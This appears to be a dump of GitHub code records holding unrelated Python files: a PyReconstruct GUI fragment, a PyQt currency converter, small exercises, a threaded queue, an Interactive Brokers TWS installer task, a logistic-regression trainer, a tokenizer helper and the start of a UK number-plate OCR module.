self.field.hideTraces()\n self.field.deselectAllTraces()\n\n def predict(self, data_fp : str = None):\n \"\"\"Run predictons.\n \n Params:\n data_fp (str): the filepath for the zarr\n \"\"\"\n self.saveAllData()\n self.removeZarrLayer()\n\n print(\"Importing models...\")\n \n from autoseg import predict, model_paths\n # model_paths = {\"a\":{\"b\":\"a/b/m.py\"}}\n\n opts = self.series.options[\"autoseg\"]\n\n response, dialog_confirmed = PredictDialog(self, model_paths, opts).exec()\n\n if not dialog_confirmed: return\n\n data_fp, model_path, cp_path, write_opts, increase, downsample, full_out_roi = response\n\n predict_opts = {\n 'zarr_current': data_fp,\n 'model_path': model_path,\n 'checkpts_dir': os.path.dirname(cp_path),\n 'write': write_opts,\n 'increase': increase,\n 'downsample_bool': downsample,\n 'full_out_roi': full_out_roi\n }\n\n for k, v in predict_opts.items():\n opts[k] = v\n self.seriesModified(True)\n \n print(\"Running predictions...\")\n\n zarr_datasets = predict(\n sources=[(data_fp, \"raw\")],\n out_file=data_fp,\n checkpoint_path=cp_path,\n model_path=model_path,\n write=write_opts,\n increase=increase,\n downsample=downsample,\n full_out_roi=full_out_roi\n )\n\n # display the affinities\n self.setZarrLayer(data_fp)\n for zg in os.listdir(data_fp):\n if zg.startswith(\"pred_affs\"):\n 
self.setLayerGroup(zg)\n break\n\n print(\"Predictions done.\")\n \n def segment(self, data_fp : str = None):\n \"\"\"Run an autosegmentation.\n \n Params:\n data_fp (str): the filepath for the zarr\n \"\"\"\n self.saveAllData()\n self.removeZarrLayer()\n\n print(\"Importing modules...\")\n \n from autoseg import hierarchical\n\n opts = self.series.options[\"autoseg\"]\n\n response, dialog_confirmed = SegmentDialog(self, opts).exec()\n\n if not dialog_confirmed: return\n\n data_fp, thresholds, downsample, norm_preds, min_seed, merge_fun = response\n\n segment_opts = {\n \"zarr_current\": data_fp,\n \"thresholds\": thresholds,\n \"downsample_int\": downsample,\n \"norm_preds\": norm_preds,\n \"min_seed\": min_seed,\n \"merge_fun\": merge_fun\n }\n\n for k, v in segment_opts.items():\n opts[k] = v\n self.seriesModified(True)\n\n print(\"Running hierarchical...\")\n\n dataset = None\n for d in os.listdir(data_fp):\n if \"affs\" in d:\n dataset = d\n break\n\n print(\"Segmentation started...\")\n \n hierarchical.run(\n data_fp,\n dataset,\n thresholds=list(sorted(thresholds)),\n normalize_preds=norm_preds,\n min_seed_distance=min_seed,\n merge_function=merge_fun\n )\n\n print(\"Segmentation done.\")\n\n # display the segmentation\n self.setZarrLayer(data_fp)\n for zg in os.listdir(data_fp):\n if zg.startswith(\"seg\"):\n self.setLayerGroup(zg)\n break\n \n def importLabels(self, all=False):\n \"\"\"Import labels from a zarr.\"\"\"\n if not self.field.zarr_layer or not self.field.zarr_layer.is_labels:\n return\n \n # get necessary data\n data_fp = self.series.zarr_overlay_fp\n group_name = self.series.zarr_overlay_group\n\n labels = None if all else self.field.zarr_layer.selected_ids\n \n labelsToObjects(\n self.series,\n data_fp,\n group_name,\n labels\n )\n self.field.reload()\n self.removeZarrLayer()\n\n if self.field.obj_table_manager:\n self.field.obj_table_manager.refresh()\n\n notify(\"Labels imported successfully.\")\n \n def mergeLabels(self):\n \"\"\"Merge selected labels in a zarr.\"\"\"\n if not self.field.zarr_layer:\n return\n \n self.field.zarr_layer.mergeLabels()\n self.field.generateView()\n \n # def mergeObjects(self, new_name=None):\n # \"\"\"Merge full objects across the series.\n \n # Params:\n # new_name (str): the new name for the merged objects\n # \"\"\" \n # names = set()\n # for trace in self.field.section.selected_traces:\n # names.add(trace.name)\n # names = list(names)\n \n # if not new_name:\n # new_name, confirmed = QInputDialog.getText(\n # self,\n # \"Object Name\",\n # \"Enter the desired name for the merged object:\",\n # text=names[0]\n # )\n # if not confirmed or not new_name:\n # return\n \n # self.series.mergeObjects(names, new_name)\n # self.field.reload()\n \n def edit3DSmoothing(self, smoothing_alg : str = \"\"):\n \"\"\"Modify the algorithm used for 3D smoothing.\n \n Params:\n smoothing_alg (str): the name of the smoothing algorithm to use\n \"\"\"\n if not smoothing_alg:\n structure = [\n [(\"radio\",\n (\"Laplacian (most smooth)\", self.series.options[\"3D_smoothing\"] == \"laplacian\"),\n (\"Humphrey (less smooth)\", self.series.options[\"3D_smoothing\"] == \"humphrey\"),\n (\"None (blocky)\", self.series.options[\"3D_smoothing\"] == \"none\"))]\n ]\n response, confirmed = QuickDialog.get(self, structure, \"3D Smoothing\")\n if not confirmed:\n return\n \n if response[0][0][1]:\n smoothing_alg = \"laplacian\"\n elif response[0][1][1]:\n smoothing_alg = \"humphrey\"\n elif response[0][2][1]:\n smoothing_alg = \"none\"\n \n if smoothing_alg not in 
[\"laplacian\", \"humphrey\", \"none\"]:\n return\n\n self.series.options[\"3D_smoothing\"] = smoothing_alg\n self.saveAllData()\n self.seriesModified()\n \n def hideSeriesTraces(self, hidden=True):\n \"\"\"Hide or unhide all traces in the entire series.\n \n Params:\n hidden (bool) True if traces will be hidden\n \"\"\"\n self.saveAllData()\n self.series.hideAllTraces(hidden)\n self.field.reload()\n \n def setFindZoom(self):\n \"\"\"Set the magnification for find contour.\"\"\"\n z, confirmed = QInputDialog.getInt(\n self,\n \"Find Contour Zoom\",\n \"Enter the find contour zoom (0-100):\",\n value=self.series.options[\"find_zoom\"],\n minValue=0,\n maxValue=100\n )\n if not confirmed:\n return\n\n self.series.options[\"find_zoom\"] = z\n \n def deleteDuplicateTraces(self):\n \"\"\"Remove all duplicate traces from the series.\"\"\"\n self.saveAllData()\n if not noUndoWarning():\n return\n \n removed = self.series.deleteDuplicateTraces()\n\n if removed:\n message = \"The following duplicate traces were removed:\"\n for snum in removed:\n message += f\"\\nSection {snum}: \" + \", \".join(removed[snum])\n TextWidget(self, message, title=\"Removed Traces\")\n else:\n notify(\"No duplicate traces found.\")\n\n self.field.reload()\n self.seriesModified(True)\n\n def addTo3D(self, obj_names, ztraces=False):\n \"\"\"Generate the 3D view for a list of objects.\n \n Params:\n obj_names (list): a list of object names\n \"\"\"\n self.saveAllData()\n \n if not self.viewer or self.viewer.is_closed:\n self.viewer = CustomPlotter(self, obj_names, ztraces)\n else: \n if ztraces:\n self.viewer.addZtraces(obj_names)\n else:\n self.viewer.addObjects(obj_names)\n \n def removeFrom3D(self, obj_names, ztraces=False):\n \"\"\"Remove objects from 3D viewer.\n \n Params:\n obj_names (list): a list of object names\n \"\"\"\n self.saveAllData()\n if not self.viewer or self.viewer.is_closed:\n return\n \n if ztraces:\n self.viewer.removeZtraces(obj_names)\n else:\n self.viewer.removeObjects(obj_names)\n \n def toggleCuration(self):\n \"\"\"Quick shortcut to toggle curation on/off for the tables.\"\"\"\n if self.field.obj_table_manager:\n self.field.obj_table_manager.toggleCuration()\n \n def backspace(self):\n \"\"\"Called when backspace is pressed.\"\"\"\n w = self.focusWidget()\n if isinstance(w, CopyTableWidget):\n w.backspace()\n else:\n self.field.backspace()\n \n def copy(self):\n \"\"\"Called when Ctrl+C is pressed.\"\"\"\n w = self.focusWidget()\n if isinstance(w, CopyTableWidget):\n w.copy()\n else:\n self.field.copy()\n \n def pasteAttributesToPalette(self, use_shape=False):\n \"\"\"Paste the attributes from the first clipboard trace to the selected palette button.\"\"\"\n if not self.field.clipboard and not self.field.section.selected_traces:\n return\n elif not self.field.clipboard:\n trace = self.field.section.selected_traces[0]\n else:\n trace = self.field.clipboard[0]\n self.mouse_palette.pasteAttributesToButton(trace, use_shape)\n \n def displayShortcuts(self):\n \"\"\"Display the shortcuts.\"\"\"\n if not self.shortcuts_widget or self.shortcuts_widget.closed:\n self.shortcuts_widget = HelpWidget(\"shortcuts\")\n\n def restart(self):\n self.restart_mainwindow = True\n\n # Clear console\n \n if os.name == 'nt': # Windows\n _ = os.system('cls')\n \n else: # Mac and Linux\n _ = os.system('clear')\n \n self.close()\n \n def closeEvent(self, event):\n \"\"\"Save all data to files when the user exits.\"\"\"\n if self.series.options[\"autosave\"]:\n self.saveToJser(close=True)\n else:\n response = 
self.saveToJser(notify=True, close=True)\n if response == \"cancel\":\n event.ignore()\n return\n if self.viewer and not self.viewer.is_closed:\n self.viewer.close()\n event.accept()\n","repo_name":"SynapseWeb/PyReconstruct","sub_path":"PyReconstruct/modules/gui/main/main_window.py","file_name":"main_window.py","file_ext":"py","file_size_in_byte":89448,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"}
+{"seq_id":"34373867226","text":"from PyQt5.QtCore import QObject, Qt\nfrom PyQt5 import QtGui\nfrom PyQt5.QtWidgets import (\n QWidget,\n QApplication,\n QMainWindow,\n QLabel,\n QPushButton,\n QDoubleSpinBox,\n QVBoxLayout\n)\n\n\nclass Course(QObject):\n def get(self):\n return 58.86\n\n\nclass Converter(QMainWindow):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.initUi()\n self.init_signals()\n self.initLayout()\n\n def init_signals(self):\n self.convertBtn.clicked.connect(self.on_click)\n self.clearBtn.clicked.connect(self.on_clear)\n self.srcAmount.valueChanged.connect(self.change_value)\n self.resultAmount.valueChanged.connect(self.change_value)\n\n def initUi(self):\n self.setWindowTitle('RUB/USD currency converter 1.0')\n self.srcLabel = QLabel('Enter the amount in rubles (RUB)', self)\n self.resultLabel = QLabel('Or enter the amount in dollars (USD)', self)\n self.srcAmount = QDoubleSpinBox(self)\n self.srcAmount.setMaximum(999999999999)\n self.resultAmount = QDoubleSpinBox(self)\n self.resultAmount.setMaximum(999999999999)\n\n self.convertBtn = QPushButton('Convert', self)\n self.clearBtn = QPushButton('Reset', self)\n self.convertBtn.setEnabled(False)\n\n def on_click(self):\n value = max(self.srcAmount.value(), self.resultAmount.value())\n if self.srcAmount.value() != 0:\n self.resultAmount.setValue(value/Course().get())\n else:\n # USD -> RUB multiplies by the RUB-per-USD rate\n self.srcAmount.setValue(value*Course().get())\n\n def on_clear(self):\n self.resultAmount.setValue(0)\n self.srcAmount.setValue(0)\n\n def change_value(self):\n if self.srcAmount.value() == 0 and self.resultAmount.value() != 0:\n self.convertBtn.setEnabled(True)\n elif self.srcAmount.value() > 0 and self.resultAmount.value() == 0:\n self.convertBtn.setEnabled(True)\n else:\n self.convertBtn.setEnabled(False)\n\n def initLayout(self):\n self.w = QWidget()\n\n self.mainLayout = QVBoxLayout(self.w)\n self.mainLayout.addWidget(self.srcLabel)\n self.mainLayout.addWidget(self.srcAmount)\n self.mainLayout.addWidget(self.resultLabel)\n self.mainLayout.addWidget(self.resultAmount)\n self.mainLayout.addWidget(self.convertBtn)\n self.mainLayout.addWidget(self.clearBtn)\n self.setCentralWidget(self.w)\n\n def keyPressEvent(self, key):\n if key.key() in (Qt.Key_Return, Qt.Key_Enter): self.on_click()\n\nimport sys\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n\n converter = Converter()\n converter.setWindowOpacity(0.95) # give the main window slight transparency\n pal = converter.palette()\n pal.setColor(QtGui.QPalette.Normal, QtGui.QPalette.Window,\n QtGui.QColor(\"#98FF98\")) # set the background-color (mint green)\n converter.setPalette(pal)\n converter.resize(350, 150)\n converter.show()\n\n\n sys.exit(app.exec_())","repo_name":"geopard26/PyQt1","sub_path":"convert_valut.py","file_name":"convert_valut.py","file_ext":"py","file_size_in_byte":3127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"39608359911","text":"def delete_nulls(lst):\n\n count = 0\n\n for i in range(0, len(lst)):\n if lst[i] != 0:\n lst[count] = lst[i]\n 
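# --- Illustrative aside ------------------------------------------------------
# The converter above divides by the RUB-per-USD rate when going from rubles
# to dollars and multiplies on the way back. The core arithmetic, separated
# from the GUI for easy testing (rate taken from Course.get() above):
def convert(amount, to_usd, rate=58.86):
    """RUB -> USD divides by the rate; USD -> RUB multiplies by it."""
    return amount / rate if to_usd else amount * rate

assert round(convert(5886.0, to_usd=True), 2) == 100.0
assert round(convert(100.0, to_usd=False), 2) == 5886.0
# ------------------------------------------------------------------------------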
count += 1\n num_zeroes = len(lst) - count\n\n for i in range(num_zeroes):\n lst.pop()\n\n print(lst)\n\n\nlistik = [0, 1, 2, 3, 0, 4, 0, 0, 19, 0, 8]\ndelete_nulls(listik)\n\n","repo_name":"pekkipo/Computer_Vision","sub_path":"untitled/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"72288824747","text":"import sys\n\n\ndef main():\n input_filename = \"minmax.in\" if len(sys.argv) == 1 else sys.argv[1]\n output_filename = \"minmax.out\" if len(sys.argv) == 1 else sys.argv[2]\n\n array = read_input(input_filename)\n minimum, maximum = solve(array)\n write_output(output_filename, minimum, maximum)\n\n\ndef read_input(filename):\n with open(filename, \"r\") as input_file:\n array_str = input_file.readline()\n array = [int(item) for item in array_str.split()]\n return array\n\n\ndef solve(array):\n minimum = min(array)\n maximum = max(array)\n return minimum, maximum\n\n\ndef write_output(filename, minimum, maximum):\n with open(filename, \"w\") as output_file:\n output_file.write(\"{minimum} {maximum}\".format(**locals()))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"YuriyGuts/lits-algorithms-course","sub_path":"handouts/problems/code/minmax.py","file_name":"minmax.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"}
+{"seq_id":"33088827397","text":"#Model: [[name, desc, creationYear, period, composer, duration, id],...]\r\n\r\nimport csv\r\nimport matplotlib.pyplot as plt\r\n\r\ndef lerObras(filename):\r\n file=open(filename, encoding=\"UTF8\")\r\n file.readline()\r\n csv_file=csv.reader(file,delimiter=\";\")\r\n\r\n lista=[]\r\n for obra in csv_file:\r\n lista.append(tuple(obra))\r\n\r\n file.close()\r\n return lista\r\n\r\ndef contarObras(lista):\r\n return len(lista)\r\n\r\ndef imprime(obras):\r\n print(f\"| {'Nome':^20} | {'Descrição':^25} | {'Ano':^8} | {'Compositor':^15} |\")\r\n for nome, desc, ano, _, comp, *_ in obras:\r\n print(f\"| {nome[:20]:20} | {desc[:25]:25} | {ano:^8} | {comp[:15]:15} |\")\r\n\r\ndef ordem(tuplo):\r\n return(tuplo[0])\r\n\r\ndef titAno(obras):\r\n lista=[]\r\n for nome, _, ano, *_ in obras:\r\n lista.append((nome,ano))\r\n\r\n lista.sort(key=ordem)\r\n return lista\r\n\r\ndef ordem2(tuplo):\r\n return(tuplo[1])\r\n\r\ndef titAno_2(obras):\r\n lista=[]\r\n for nome, _, ano, *_ in obras:\r\n lista.append((nome,ano))\r\n \r\n lista.sort(key=ordem2)\r\n return lista\r\n\r\ndef titporAno(obras):\r\n dici={}\r\n for nome, _, ano, *_ in obras:\r\n if ano in dici.keys():\r\n dici[ano].append(nome)\r\n else:\r\n dici[ano]=[nome]\r\n return dici\r\n\r\ndef titporPeriodo(obras):\r\n dici={}\r\n for nome, _, _, periodo, *_ in obras:\r\n if periodo in dici.keys():\r\n dici[periodo].append(nome)\r\n else:\r\n dici[periodo]=[nome]\r\n return dici\r\n\r\n\r\ndef titporCompositor(obras):\r\n dict={}\r\n for nome, _, _, _,compositor, *_ in obras:\r\n if compositor in dict.keys():\r\n dict[compositor].append(nome)\r\n else:\r\n dict[compositor]=[nome]\r\n return dict\r\n\r\ndef grafico(obras,criterio):\r\n distrib=criterio(obras)\r\n height=[]\r\n for list in distrib.values():\r\n height.append(len(list))\r\n plt.bar(distrib.keys(), height)\r\n plt.xticks([x for x in range(0, len(distrib.keys()))], distrib.keys(), rotation='vertical')\r\n plt.show()\r\n return\r\n\r\ndef novaDistrib(obras):\r\n res= 
[]\r\n listaComp= []\r\n for obra in obras:\r\n nome, desc, ano, periodo, comp, duracao, id = obra\r\n if comp not in listaComp:\r\n listaComp.append(comp)\r\n for compositor in listaComp:\r\n listaObras= []\r\n for obra in obras:\r\n nome, desc, ano, periodo, comp, duracao, id = obra\r\n if comp == compositor:\r\n listaObras.append(nome)\r\n res.append((compositor, listaObras))\r\n return res\r\n\r\ndef lernovaDistrib(lista):\r\n for tuplo in lista:\r\n autor, obras = tuplo\r\n i = 1\r\n branco = \"\"\r\n print(f\"\\n{autor:<30}|{obras[0]:<20}\")\r\n while i != len(obras):\r\n print(f\"{branco:<30}|{obras[i]:<20}\")\r\n i += 1\r\n return","repo_name":"Nunolxm/ATP2022","sub_path":"TPC6/obras.py","file_name":"obras.py","file_ext":"py","file_size_in_byte":2871,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33892766266","text":"from collections import deque\n\nfrom concurrent.futures import Future\n# fut = Future()\n# fut.result() # blocks - wait for set_result\n# other threads\n# fut.set_result(42) # unblock\n\nfrom threading import Thread, Lock\n\nfrom time import sleep\n\nclass Queuey:\n def __init__(self, maxsize):\n self.mutex = Lock()\n self.maxsize = maxsize\n self.items = deque()\n self.getters = deque()\n self.putters = deque()\n\n def get_noblock(self):\n with self.mutex:\n if self.items:\n # Wake a putter\n if self.putters:\n self.putters.popleft().set_result(True)\n return self.items.popleft(), None\n else:\n fut = Future()\n self.getters.append(fut)\n return None, fut\n\n def put_noblock(self, item):\n with self.mutex:\n if len(self.items) < self.maxsize:\n self.items.append(item)\n # Wake a getter\n if self.getters:\n self.getters.popleft().set_result(\n self.items.popleft())\n else:\n fut = Future()\n self.putters.append(fut)\n return fut\n\n def get_sync(self):\n item, fut = self.get_noblock()\n if fut:\n item = fut.result() # wait for it\n return item\n\n def put_sync(self, item):\n while True: # try to put\n fut = self.put_noblock(item)\n if fut is None:\n return \n fut.result()\n\ndef producer(q, n):\n for i in range(n):\n q.put_sync(i)\n q.put_sync(None)\n\ndef consumer(q):\n while True:\n print(\"Trying to get\")\n item = q.get_sync()\n if item is None:\n break\n\n print(\"Got:\", item)\n\nif __name__ == \"__main__\":\n q = Queuey(2)\n Thread(target=producer, args=(q, 10)).start()\n Thread(target=consumer, args=(q,)).start()\n","repo_name":"monarin/divelite","sub_path":"python3/asyncio/thread_q.py","file_name":"thread_q.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27689351725","text":"import os\nimport posixpath\n\nfrom celery import shared_task\n\nIB_HOME = os.getenv('IB_HOME', '')\n\n# download and extract TWS jar file\ncmd_install = \"\"\"\\\nIB_HOME=%(IB_HOME)s\nmkdir $IB_HOME\ncd $IB_HOME\nwget https://download2.interactivebrokers.com/download/unixmacosx_latest.jar\njar xf unixmacosx_latest.jar\n\"\"\"\n\n# Command to install TWS from extracted jar file\ncmd_run = \"\"\"\\\nIB_HOME=%(IB_HOME)s\ncd $IB_HOME/IBJts\njava -cp jts.jar:total.2013.jar -Xmx512M -XX:MaxPermSize=128M jclient.LoginFrame .\n\"\"\"\n\n@shared_task\ndef install():\n cmd = cmd_install % {'IB_HOME': IB_HOME}\n os.system(cmd)\n\n@shared_task\ndef run():\n cmd = cmd_run % {'IB_HOME': IB_HOME}\n 
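# --- Illustrative aside ------------------------------------------------------
# The Queuey class above parks blocked callers on concurrent.futures.Future
# objects: a get() on an empty queue receives a future, and a later put()
# delivers the item straight into it. The handoff in miniature:
from concurrent.futures import Future

getter = Future()          # a parked consumer, as stored in self.getters
getter.set_result("item")  # a producer arrives and wakes the consumer
assert getter.result() == "item"
# ------------------------------------------------------------------------------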
os.system(cmd)\n","repo_name":"zbanga/abund.com","sub_path":"pulley-0.0.2/pulley/brokers/ib/tws.py","file_name":"tws.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"25574914950","text":"import os\nimport math\nfrom model import *\nfrom load_data import load_data\nfrom batch import batcher\n\nif __name__ == \"__main__\":\n dirpath = os.path.dirname(__file__)\n #parameter\n vocasize = 195887\n epoch = 100\n n_in = vocasize\n n_out = 1\n lr = 0.005\n minibatch_size = 32\n\n train_x,train_y,dev_x,dev_y,test_x,test_y = load_data(dirpath,vocasize)\n m = math.ceil(len(train_y)/minibatch_size)\n #train\n model = LogisticRegression(n_in,n_out,lr,minibatch_size)\n print('Start Training..')\n for ep in range(epoch):\n loss = 0\n accuracy = 0\n for input_x,label_y in batcher(train_x,train_y,minibatch_size):\n y = model.forward(input_x)\n loss += model.cross_entropy_function(y,label_y)\n accuracy += model.accuracy(y,label_y)\n delta_w,delta_b = model.backward(input_x,y,label_y)\n model.update(delta_w,delta_b)\n print(\"Train | Epoch:{0} | Data Size:{1} | Loss:{2:.3f} | Accuracy:{3:.2f}\".format(ep+1,len(train_x),loss/m,accuracy/m))\n if ep%10==0:\n y = model.forward(dev_x)\n loss = model.cross_entropy_function(y,dev_y)\n accuracy = model.accuracy(y,dev_y)\n print(\"Dev | Epoch:{0} | Data Size:{1} | Loss:{2:.3f} | Accuracy:{3:.2f}\".format(ep+1,len(dev_y),loss,accuracy))\n\n #test\n y = model.forward(test_x)\n loss = model.cross_entropy_function(y,test_y)\n accuracy = model.accuracy(y,test_y)\n print(\"Test | Data Size:{0} | Loss:{1:.3f} | Accuracy:{2:.2f}\".format(len(test_y),loss,accuracy))\n","repo_name":"RyosukeOzaki/Logistic-Regression-binary-","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"35668053196","text":"\"\"\"Utility Class for reading and writing input output\"\"\"\nimport json\n\n\nclass IOUtil:\n\n @staticmethod\n def read_index_vector_json(file_path):\n with open(file_path, 'r') as json_file:\n input_file = json.load(json_file)\n label_list = [entry['label'] for entry in input_file['keys']]\n vector_list = [entry['embedding'] for entry in input_file['keys']]\n index2label = {index: label for index, label in enumerate(label_list)}\n vec_dim = len(vector_list[0])\n return vec_dim, index2label, vector_list\n","repo_name":"atulathome/similarity-search-service","sub_path":"src/util/io_util.py","file_name":"io_util.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"4561003485","text":"from datetime import date\r\natual = date.today().year\r\ntotmaior = 0\r\ntotmenor = 0\r\nfor c in range(1,8):\r\n ano = int(input('Enter your year of birth:'))\r\n idade = atual - ano\r\n print('Your age is {}'.format(idade))\r\n if idade >= 21:\r\n totmaior = totmaior + 1\r\n else:\r\n totmenor += 1\r\nprint('The number of people of legal age was {} and the number of \\n minors was {}'.format(totmaior, totmenor))\r\nprint('Thank you for coming!')\r\n","repo_name":"talitaruiz/Python-Files","sub_path":"Ex054_Maioridade.py","file_name":"Ex054_Maioridade.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"18825602731","text":"from 
keras_preprocessing.sequence import pad_sequences\r\nfrom keras_preprocessing.text import Tokenizer\r\n\r\nfrom ML_Pipeline.Constants import max_text_length, vocab_size, model_dir\r\nfrom ML_Pipeline.utils import save_tokenizer\r\n\r\noov_token = \"<OOV>\"\r\npadding_type = \"post\"\r\ntruncation_type=\"post\"\r\n\r\ndef build_tokenizer(df_train,num_words=None):\r\n if num_words is None:\r\n tokenizer = Tokenizer(oov_token=oov_token)\r\n else:\r\n tokenizer = Tokenizer(oov_token=oov_token,num_words=vocab_size)\r\n\r\n tokenizer.fit_on_texts(df_train)\r\n word_index = tokenizer.word_index\r\n print(\" Word Index length \", len(word_index))\r\n print(\" Number of Words: \", tokenizer.num_words)\r\n save_tokenizer(tokenizer,num_words)\r\n return tokenizer\r\n\r\ndef prepare_seqence_data(text,tokenizer):\r\n\r\n print(text.head(2))\r\n # Create Sequence\r\n print(\" Create Sequence \")\r\n text_sequences = tokenizer.texts_to_sequences(text)\r\n\r\n # Missing words in Glove vectors\r\n #words_used = [tokenizer.index_word[i] for i in range(1, vocab_size)]\r\n #missing_words = set(words_used) - set(word_vec.index.values)\r\n #print(len(missing_words))\r\n #missing_word_index = [tokenizer.word_index[word] for word in missing_words]\r\n\r\n\r\n # Pad the Sequences, because the sequences are not of the same length,\r\n # so let’s pad them to make them of similar length\r\n text_padded = pad_sequences(text_sequences, maxlen=max_text_length, padding=padding_type,\r\n truncating=truncation_type)\r\n\r\n # test_text_padded = pad_sequences(test_text_sequences, maxlen=max_text_length, padding=padding_type,\r\n # truncating=truncation_type)\r\n\r\n print(\"Padded Sequence :: \", text_padded[0:5])\r\n\r\n return text_padded\r\n\r\n\r\n","repo_name":"ykmanoj/sequence_classification_news","sub_path":"src/nlp/text_tokenize.py","file_name":"text_tokenize.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"73001476907","text":"# UKRegOCR.py\r\n# SJM / MCL 2018 www.marvellconsultants.com\r\n#\r\n# Import this as a module for access to:\r\n# ReadPlate(img, target_size, plateXYWH)\r\n# lookForPlate(img, target_size) and\r\n# WhtOrYel(img, AOI)\r\n# To run as a script, please provide an image file name on the command line, results will be printed to stdout\r\n# See PDF documentation for more details\r\n\r\n# Dependencies:\r\n# Python 3.x with openCV (cv2) & numpy libraries\r\n# Plus:\r\n# OCRFonts module (OCRFonts.py)\r\n# UKPlates66x20P.xml and\r\n# UKChars33_16x25_11W.xml haar-cascade classifier files\r\n# - All in the same directory as UKRegOCR.py.\r\n\r\n# target_size:\r\n# Tuple TargetWH should approximate the nominal, mid-field size in pixels (W,H) of a UK number plate\r\n# as seen by your camera. 
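# --- Illustrative aside ------------------------------------------------------
# End-to-end shape of the tokenise-then-pad pipeline above on toy data
# (requires keras_preprocessing; maxlen=4 is chosen just for the example):
from keras_preprocessing.text import Tokenizer
from keras_preprocessing.sequence import pad_sequences

tok = Tokenizer(oov_token="<OOV>")
tok.fit_on_texts(["good news today", "bad news"])
seqs = tok.texts_to_sequences(["good news", "no news today"])
padded = pad_sequences(seqs, maxlen=4, padding="post", truncating="post")
# "no" is unseen, so it maps to the OOV index; short rows are zero-padded
# and padded.shape == (2, 4)
# ------------------------------------------------------------------------------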
The plate should be roughly horizontal and reasonably un-distorted,\r\n# the reader can handle only ~10 degrees max of rotation and skew.\r\n# Pre-process your images with one of openCV's affine transforms if necessary.\r\n# Note that a plate height of 50 pixels corresponds to a character height of about 33 pixels, the reader\r\n# works ok down to a character-height of around 25 pixels in good quality, sharp images, less well below that.\r\n# If characters are much bigger then processing speed will start to suffer.\r\n\r\n# Change Log:\r\n# 01/10/18 First public release\r\n\r\n# To Do:\r\n# Leading zero disqualification in all but @@##@@@ format plates\r\n# Use logging module for debug o/ps\r\n# Re-visit initial crop after initial character-classifier detection?\r\n# Re-visit rotation after initial XC?\r\n\r\nimport math, time, pprint\r\nimport cv2\r\nimport numpy as np\r\nimport OCRFonts\r\n\r\n# Module globals\r\nDEBUG = False # set True to print verbose debug info\r\nASPECT = 0.625 # nominal aspect ratio of non-I characters as seen in centre-field, width/height\r\nASPI = 0.23 # relative width of the I char cf all other chars\r\nPH2TH = 1.57 # approx text height cf lookForPlate()-detected plate height (varies 1.2 .. 1.8)\r\nPW2CH = 6 # approx UKPlate text-span-width from observed naked character height\r\nSTW2TW = 8.3 # approx UKPlate string width from naked-text-width, use this when we have a better handle on tw\r\nCAS_OVER = 0.91 # correction for CharCas's over-estimate of char height (about 10%)\r\n\r\nPLCAS = cv2.CascadeClassifier('UKPlates66x20P.xml') # SJM's default cascade plate classifier P=conservative\r\nCHCAS = cv2.CascadeClassifier('UKChars33_16x25_11W.xml') # SJM's favorite character spotter\r\n\r\n# Templates for all valid UK plate formats, with corresponding arbitrary likelihood scores.\r\n# Scores should be in the range 0..25. # for a number, @ for an alpha. 
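# --- Illustrative aside ------------------------------------------------------
# How the geometry constants above combine: for a detected plate height ph,
# ReadPlate() derives the expected text height as ph/PH2TH and the non-I
# character width as ASPECT times that; ASPI scales the narrow 'I' glyph:
ph = 50                            # nominal plate height in pixels
th = int(0.5 + ph / 1.57)          # PH2TH  -> text height ~ 32 px
tw = int(0.5 + 0.625 * ph / 1.57)  # ASPECT -> char width  ~ 20 px
wI = int(0.5 + tw * 0.23)          # ASPI   -> 'I' width   ~  5 px
# ------------------------------------------------------------------------------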
lowest scores first.\r\nPlateLUT = {'#@':0,'@#':0,\r\n '##@':1,'@##':1,'#@@':1,'@@#':1,\r\n '@###':2,'###@':2,\r\n '@@##':3,'##@@':3,\r\n '@@@#':4,\r\n '####@':5,'@####':5,\r\n '@@###':6,'###@@':6,\r\n '@@@##':7,\r\n '@@@#@':9,'@#@@@':9,'@@####':9,'####@@':9,\r\n '@@@###':11,\r\n '@@@##@':13,'@##@@@':13,\r\n '@@@####':17,\r\n '@@@###@':20,'@###@@@':20,\r\n '@@##@@@':24}\r\n\r\n# ----------------- public functions ----------------------\r\n\r\n# Look for a target number-plate in the image using HaarCascade classifier\r\n# Return object geometry as (X,Y,W,H) tuple if found, else return (0,0,0,0).\r\n# Use an iterative approach with varying sensitivity parameters to try to obtain exactly one hit\r\n# If that's not possible return just the first hit.\r\ndef lookForPlate(img, TargetWH=(170,50), xml=None):\r\n pltCas = PLCAS\r\n if xml is not None:\r\n try: # attempt to load the specified cascade xml file\r\n pltCas = cv2.CascadeClassifier(xml)\r\n except:\r\n return [0,0,0,0] # no xml file\r\n # Start working at the most sensitive level (z=0), if there's no recognition here then we're done.\r\n z = 0 # sensitivity factor; must start at zero (most sensitive) for no-hit logic to work\r\n ll, ul = 0, 99\r\n pls0 = [0,0,0,0]\r\n while True:\r\n Tmin = (int(TargetWH[0] * 0.5), int(TargetWH[1] * 0.5))\r\n Tmax = (Tmin[0] * 3, Tmin[1] * 3)\r\n pls = 